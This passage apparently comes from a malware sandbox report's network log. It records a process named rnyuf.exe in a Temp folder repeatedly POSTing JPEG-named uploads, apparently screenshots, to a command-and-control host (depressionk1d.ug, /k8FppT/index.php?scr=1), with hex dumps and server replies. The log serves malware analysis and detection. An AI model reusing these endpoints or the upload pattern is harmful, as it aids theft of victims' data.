                                                                                                                                                                                Nov 11, 2021 12:27:24.469852924 CET26718OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:24.469926119 CET26723OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:24.470077991 CET26728OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:27:24.470107079 CET26732OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:24.470175982 CET26738OUTData Raw: 80 f6 a4 f2 41 a5 74 35 58 cc 31 d3 76 56 99 b7 a6 1b 7f 6a 45 aa c8 ce da 47 6a 4c 55 e6 b7 f6 a8 9a 12 3b 53 b1 6a 69 90 01 4e c5 3b 66 29 42 d1 61 f3 0c c5 18 a9 76 71 48 57 14 0a e3 29 31 4f 2b 48 45 01 71 b4 62 9d 8a 28 01 31 4b 8a 5a 51 40
                                                                                                                                                                                Data Ascii: At5X1vVjEGjLU;SjiN;f)BavqHW)1O+HEqb(1KZQ@\@)QKL.(;i=+8p[ErC6<?Sv"A.dO9PWacS$)ms}z.~j-.V8qG~l{\kFT*O:q\5
                                                                                                                                                                                Nov 11, 2021 12:27:24.495312929 CET26743OUTData Raw: 7b e3 9d 3d f4 ad 62 5d 26 ea d6 7b cd 3d b6 98 da 45 6d fc ae 58 05 6c 95 f9 b1 9e 39 06 ba 74 ba b7 91 65 64 9e 26 58 58 a4 a5 5c 1d 8c 39 20 fa 11 ef 4e 54 e5 15 76 bf af e9 89 49 37 64 4b 45 65 6b 3a a9 b2 f0 fc ba 9d 93 43 30 0a 8d 1b 67 72
                                                                                                                                                                                Data Ascii: {=b]&{=EmXl9ted&XX\9 NTvI7dKEek:C0gr0br#jugZ,3+?xCvVu4[W83<w(<A>rK"(d4bDH9'<RqkFgiCeZxzQyivjT1T'zg9]`.QU&t
                                                                                                                                                                                Nov 11, 2021 12:27:24.495372057 CET26748OUTData Raw: fd ec d0 5f f9 57 7f da 4d a8 5b ca 61 dc b1 b1 5d 85 19 73 f3 29 5d c0 e0 a9 e7 b6 2a 93 a2 9b 4b f5 ee ad 7f d6 df 22 5a 9b 5f d7 67 ff 00 00 c7 5d 75 b4 5d 6f c4 7a 96 af 6c 90 3c 56 f6 68 63 8a 70 e8 c5 8c 81 70 ec 17 8c 91 92 c0 63 9e dc 9b
                                                                                                                                                                                Data Ascii: _WM[a]s)]*K"Z_g]u]ozl<Vhcppc+i-?PAVr_]5dX1n7 4]OT5?R-E?RAnT^]/ de&q7uU7y4e'N<


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                42192.168.2.549860178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:25.421066999 CET26788OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----d5785a5445836dca8f7ebb53840fcee7
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 95528
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:25.421194077 CET26788OUTData Raw: 2d 2d 2d 2d 2d 2d 64 35 37 38 35 61 35 34 34 35 38 33 36 64 63 61 38 66 37 65 62 62 35 33 38 34 30 66 63 65 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------d5785a5445836dca8f7ebb53840fcee7Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:25.421399117 CET26798OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:25.421545982 CET26801OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:25.446445942 CET26802INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:25 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 1230
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                ETag: "5a4b7cd2-4ce"
                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                                                                                                                                                                                Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                                                                                                                                                                                Nov 11, 2021 12:27:25.446664095 CET26808OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:25.446837902 CET26813OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:25.446933985 CET26818OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:27:25.447056055 CET26822OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:25.447082996 CET26828OUTData Raw: 9e d5 46 63 04 92 5d bb 69 fa 9c e9 7d 10 4b bf 3e fd 5a 66 2a c1 95 95 c4 40 0c 63 1c ab 70 48 e2 ab df 25 dd ef f6 ac 8f 6a 15 b5 28 16 df 62 37 10 2a bc 6c b8 ce 73 81 18 5f c7 35 ce a5 8f d6 d7 fe 9e c7 47 2e 5d 75 7b 6f af ea ff 00 ae a7 43
                                                                                                                                                                                Data Ascii: Fc]i}K>Zf*@cpH%j(b7*ls_5G.]u{oCvicVvenb+]G8H*<H2I,$+xnGH=i;S'qzWqB}$(QFk)&\YAwSP+K4&GNVu~|x<RzxE=@RYTc$
                                                                                                                                                                                Nov 11, 2021 12:27:25.472183943 CET26833OUTData Raw: 6f f1 d7 51 b5 b5 86 dd 34 4b 42 b1 22 a2 96 95 b2 40 18 e6 a4 ff 00 85 f9 aa 7f d0 12 cb fe fe bd 70 53 8d 7a 7f 0f 5f 4f c8 ed a8 e8 54 b7 37 4f 5f cc f4 c5 f0 64 97 93 a4 9a ee b3 75 a9 a4 67 2b 01 5f 2a 3c fb a8 27 3f a5 6e 6a ea b1 f8 7e fd
                                                                                                                                                                                Data Ascii: oQ4KB"@pSz_OT7O_dug+_*<'?nj~BH@a_@K/=NkgMFdlF?:*FO__m:0R$LQ(L@GzQLRQEffiE;R%JM%&4-/zJQ@04RQ@@Qi(=i6
                                                                                                                                                                                Nov 11, 2021 12:27:25.472275972 CET26839OUTData Raw: 5c b8 79 ba 70 e5 71 77 0c 56 1a 55 6a 39 c6 4a c5 c0 c3 14 a1 c5 66 37 8c 7c 2b fc 36 f7 b5 0b 78 cb c3 5d a1 bd ae 85 55 3e 8c e5 78 4a 8b b1 b8 18 1e f4 64 57 3c 7c 67 e1 fe d1 5e 53 4f 8c f4 21 d2 3b bf d2 9f 3a ec 2f ab d4 3a 4c d2 e6 b9 9f
                                                                                                                                                                                Data Ascii: \ypqwVUj9Jf7|+6x]U>xJdW<|g^SO!;:/:LMA,GQ,CT*v:qN-?K)`4k=G)`iC]1PTv q(vMZ;QOX[R\BZL(b


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                43192.168.2.549861178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:26.388487101 CET26878OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----6cf74e1c753ea9ca8f54f538cbca99ae
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 99801
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:26.399912119 CET26878OUTData Raw: 2d 2d 2d 2d 2d 2d 36 63 66 37 34 65 31 63 37 35 33 65 61 39 63 61 38 66 35 34 66 35 33 38 63 62 63 61 39 39 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------6cf74e1c753ea9ca8f54f538cbca99aeContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:26.400199890 CET26888OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:26.400409937 CET26891OUTData Raw: 23 d6 ef f5 2b 2d 32 df cf be b9 8a de 3c e0 34 8d 8c 9f 41 ea 7e 95 8b 1f 8f 7c 31 2c a2 35 d5 50 31 e3 2d 13 a8 fc ca e2 b2 74 3d 3a 3d 7d 5f c5 3e 21 09 22 36 e6 b6 82 53 98 e0 88 13 c9 07 83 d3 bf d6 ad db f8 a3 c2 5a cd c8 d2 c0 85 fc c3 b1
                                                                                                                                                                                Data Ascii: #+-2<4A~|1,5P1-t=:=}_>!"6SZ[|#d~UK4~2x5_,w7p]Z\|{)q_4|J?-XYHKgp8^gjZneaqGhF18<1yQXTJk4tyQ[Q@(
                                                                                                                                                                                Nov 11, 2021 12:27:26.425339937 CET26897OUTData Raw: 31 28 a2 97 b5 20 13 14 51 4b cd 16 01 29 68 a2 9a 01 28 a5 a3 14 80 39 a3 9a 39 a2 98 09 45 29 a2 95 80 4a 29 68 a0 2e 47 5e 9d f0 27 3f f0 b0 24 c7 53 61 2e 3f ef a5 af 31 ab 16 97 d7 76 12 99 6c ee a7 b6 90 ae d2 f0 c8 50 91 e9 91 db 81 f9 56
                                                                                                                                                                                Data Ascii: 1( QK)h(99E)J)h.G^'?$Sa.?1vlPVr\}j.\KR#?_m[8w+XRk^#SVyR4}88kkV#ck::06?A=<CRK<2D"R#
                                                                                                                                                                                Nov 11, 2021 12:27:26.425374031 CET26902OUTData Raw: fe 82 68 03 e3 db 7f f5 42 a6 a8 ad bf d5 0a 9b 15 ee c1 7b a8 f1 65 f1 30 02 97 14 01 4e ab 20 6e 29 71 4b 45 31 06 28 a5 a2 80 12 8c 53 b1 46 28 15 c6 e2 97 14 a0 51 8a 76 0b 88 45 18 a5 c5 2e 28 b0 5c 4c 52 62 9d 8a 31 8a 2c 2b 8c c5 2e 29 d4
                                                                                                                                                                                Data Ascii: hB{e0N n)qKE1(SF(QvE.(\LRb1,+.)r<Q~(b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK
                                                                                                                                                                                Nov 11, 2021 12:27:26.425390005 CET26905OUTData Raw: 78 34 a4 9b 3d 7b 47 b0 d4 bc 49 e2 75 f1 15 b5 8c 70 da 47 a8 44 ce ab f2 f4 75 27 03 b9 03 92 7d eb 2f c6 0e c9 e3 4d 49 d1 8a b2 cf 90 c0 e0 83 81 5c f5 b7 c6 3f 13 59 89 45 b4 1a 64 42 59 0c ae 12 d8 80 58 f5 3f 7b be 2b 02 ff 00 c6 7a 9e a5
                                                                                                                                                                                Data Ascii: x4={GIupGDu'}/MI\?YEdBYX?{+z5vt?u`{:ZQQz-|Mk=QGO1A5^ hu90T|[5OzOE_c\NWX%t#Y+V5V)R%P
                                                                                                                                                                                Nov 11, 2021 12:27:26.425488949 CET26907OUTData Raw: 32 d7 fa dc ca 73 8c a3 a7 f5 b1 5b 15 d5 69 ba ac ba 57 85 2e 6f ef 6c b4 a9 a2 65 6b 4d 3a 29 b4 db 76 79 65 fe 29 0b 98 f7 91 18 3d 49 e5 8a 8e 99 15 ca d6 b2 f8 97 55 5b 2b 7b 32 34 d9 6d ed a3 31 c2 27 d2 ed a4 64 52 49 20 33 46 5b a9 27 af
                                                                                                                                                                                Data Ascii: 2s[iW.olekM:)vye)=IU[+{24m1'dRI 3F['Sr+1YjZIq:9n"Q%i9;~cUt]+T~y%Gn0o\c,+Qn-|DdB"INR[VsqoxXUn\/
                                                                                                                                                                                Nov 11, 2021 12:27:26.425523043 CET26910OUTData Raw: 4c 51 8a 2c 2b 91 14 a4 31 d4 d8 a5 db 4a c8 7c c5 63 1d 46 62 e2 ae ed f6 a4 29 9a 9e 41 aa 86 7b 45 51 18 ab 4d a2 cd 44 62 a9 74 cd 23 54 cd 31 d4 6d 1f 15 a4 d0 d4 4d 0d 63 2a 66 d1 aa 65 bc 55 03 47 5a 8f 15 40 f1 57 3c e9 9d 10 aa 66 95 c5
                                                                                                                                                                                Data Ascii: LQ,+1J|cFb)A{EQMDbt#T1mMc*feUGZ@W<f0^xJPE79ZaZH!WIiE*QE%sh)jx'"20I=R))3FhsIAH)]p4M14?44)V5JioW>b
                                                                                                                                                                                Nov 11, 2021 12:27:26.425595045 CET26912OUTData Raw: da be d5 e6 5e 5b bf da 3c bd 9e 6e 63 73 bf 6f f0 e7 ae 3b 66 b2 a7 8f c5 7b 48 c6 56 b3 7d 9f ea 67 57 2b c2 2a 52 94 13 ba 5d ff 00 e0 9c 17 90 c3 b5 37 66 0d 5c 57 a9 83 46 df 7d 01 af 79 cd a3 e3 94 f5 d4 ce db 46 c0 7b 56 a8 b4 b7 97 ee 31
                                                                                                                                                                                Data Ascii: ^[<ncso;f{HV}gW+*R]7f\WF}yF{V1ZJ2OSE=Q`T/iZg4~&jR,\~=upPIcM'#zx&{bU&vw:fA.W5JQZ*2aPI+TwFfz`jVUjr9Eu+jS8 G
                                                                                                                                                                                Nov 11, 2021 12:27:26.425658941 CET26914OUTData Raw: 98 c1 46 29 d8 34 63 da 8b 30 b8 da 70 1c 50 05 38 0a 76 15 c0 0a 70 a4 c5 38 0a a4 4b 12 9d 49 8a 51 4c 40 29 c2 90 52 81 54 84 c7 01 4e c5 20 a7 d5 22 18 98 a7 05 a5 14 e1 56 91 2d 88 12 97 65 38 53 a9 d8 8b 91 79 74 9e 5d 4c 29 c1 73 4f 96 e1
                                                                                                                                                                                Data Ascii: F)4c0pP8vp8KIQL@)RTN "V-e8Syt]L)sOY[F~^e[1ythVHc>r6(r6)rm.*]mthB`!^2=Sd?aMV(G|i^f
                                                                                                                                                                                Nov 11, 2021 12:27:26.505641937 CET26981INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:26 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                44192.168.2.549862178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:27.269534111 CET26981OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----cd9bcadf274a423ef14786be70bb2f2c
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 94395
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:27.269646883 CET26982OUTData Raw: 2d 2d 2d 2d 2d 2d 63 64 39 62 63 61 64 66 32 37 34 61 34 32 33 65 66 31 34 37 38 36 62 65 37 30 62 62 32 66 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------cd9bcadf274a423ef14786be70bb2f2cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:27.269851923 CET26992OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:27.269983053 CET26994OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:27.294698954 CET26996INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:27 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 1230
                                                                                                                                                                                Connection: keep-alive
